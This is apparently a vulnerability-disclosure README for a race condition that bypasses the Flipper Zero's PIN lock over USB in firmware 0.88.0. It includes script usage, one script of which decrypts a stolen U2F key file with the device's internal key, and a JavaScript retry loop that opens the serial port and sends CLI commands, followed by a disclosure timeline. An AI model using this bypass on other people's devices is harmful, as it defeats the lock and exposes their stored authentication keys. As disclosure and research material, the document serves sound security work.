Proof of concept for a Flipper Zero PIN bypass vulnerability. Tested on firmware 0.88.0, the latest release at the time of writing.
- Node.js 18+
- `serialport` dependency. Install with `npm ci` or `yarn`.
Makes the Flipper vibrate.

```sh
# Execute and follow the instructions
./poc-vibro.mjs /dev/tty.usbmodemflip_1337
```
Decrypts a `key.u2f` file taken from the SD card using the Flipper's internal key.

```sh
# Assume that we've already extracted key.u2f from Flipper's SD card into /foo/key.u2f
# Execute and follow the instructions
./poc.mjs /dev/tty.usbmodemflip_1337 /foo/key.u2f
```
The firmware has a race condition in the lock screen routine: for a few moments after reset, it is possible to establish a CLI connection over USB and send commands to the device even though it is PIN-locked.

The PoC repeatedly tries to establish a connection. If it succeeds, it sends commands to the Flipper's CLI.

The time window is small, but large enough to perform cryptographic operations with the CKS, or simply to make the Flipper vibrate :)
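The loop below is an added illustration of the race described above; it is not the repository's `poc.mjs` or `poc-vibro.mjs`. It keeps trying to open the USB CDC port at a short interval until the open succeeds or a deadline passes, then writes a couple of CLI commands. The transport is injected, so the retry logic can be exercised without hardware. Assumptions (not taken from this page): the `serialport` npm package's v10+ API (`new SerialPort({ path, baudRate }, cb)`), a baud rate of 230400, CR LF line termination, and `vibro 1` / `vibro 0` as valid Flipper CLI commands.

```javascript
// Added example, not the project's own code. Assumed CLI commands:
const DEFAULT_COMMANDS = ['vibro 1', 'vibro 0'];

function realSleep(ms) {
  return new Promise((resolve) => setTimeout(resolve, ms));
}

// Call openPort() again and again until it resolves or deadlineMs has
// elapsed since the first attempt. Each failure is retried after
// intervalMs. `now` and `sleep` are injectable so the loop can be
// driven by a fake clock in a test.
async function openWithinWindow(openPort, opts = {}) {
  const { intervalMs = 50, deadlineMs = 10000, now = Date.now, sleep = realSleep } = opts;
  const start = now();
  let attempts = 0;
  let lastError = null;
  while (now() - start < deadlineMs) {
    attempts += 1;
    try {
      const port = await openPort();
      return { port, attempts, lastError: null };
    } catch (err) {
      lastError = err;
      await sleep(intervalMs);
    }
  }
  return { port: null, attempts, lastError };
}

// Write each command terminated by CR LF (assumed line ending) and return
// the commands that were written. `port.write` must return a promise so a
// failed write surfaces as a rejection instead of being silently dropped.
async function sendCommands(port, commands = DEFAULT_COMMANDS) {
  const sent = [];
  for (const cmd of commands) {
    await port.write(`${cmd}\r\n`);
    sent.push(cmd);
  }
  return sent;
}

// Real transport on top of the `serialport` package (assumed v10+ API and
// 230400 baud). The open fails while the CLI is not yet reachable, which is
// what openWithinWindow() retries on.
function makeSerialOpener(path) {
  return async () => {
    const { SerialPort } = await import('serialport');
    const sp = await new Promise((resolve, reject) => {
      const p = new SerialPort({ path, baudRate: 230400 }, (err) => (err ? reject(err) : resolve(p)));
    });
    return {
      write: (data) => new Promise((resolve, reject) => sp.write(data, (err) => (err ? reject(err) : resolve()))),
      close: () => new Promise((resolve) => sp.close(() => resolve())),
    };
  };
}

async function main(portPath) {
  const { port, attempts, lastError } = await openWithinWindow(makeSerialOpener(portPath), {
    intervalMs: 20,
    deadlineMs: 15000,
  });
  if (!port) {
    console.error(`gave up after ${attempts} attempts: ${lastError && lastError.message}`);
    process.exitCode = 1;
    return;
  }
  console.log(`CLI opened after ${attempts} attempts, sending commands`);
  const sent = await sendCommands(port);
  console.log(`sent: ${sent.join(', ')}`);
  await port.close();
}

// Only touch hardware when a device path is passed on the command line,
// e.g. `node poc-race.mjs /dev/tty.usbmodemflip_1337` (reset the Flipper
// right after starting it, so the open attempts overlap the window).
if (process.argv[2] && process.argv[2].startsWith('/dev/')) {
  main(process.argv[2]);
}
```

The deadline matters in practice: if the window is missed, the loop must stop rather than hammer the port forever, and reporting the last open error tells you whether the port was absent, busy, or refused.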
- On 2023-08-12, I reached out to Flipper's support team by email asking for the GitHub username of the security contact so I could privately share this repository to triage this vulnerability.
- On 2023-08-16, Flipper's support team replied that this vulnerability should be disclosed using public GitHub issues.
- On 2023-08-17, I reached out to the Flipper development team in the Telegram community asking for the security contact, but received a "we don't consider this as a vulnerability" reply.
- Initially, the disclosure deadline was set to 2023-09-11. But since Flipper's team doesn't consider this a vulnerability, I'm publishing this right now.
- First of all, thanks to Flipper's team for the great device!
- Dmitry Nourell (@imcatwhocode) for a good catch on Flipper boot animations and the PoC.
- Egor Koleda (@radioegor146) for the initial PoC and help with weird bugs.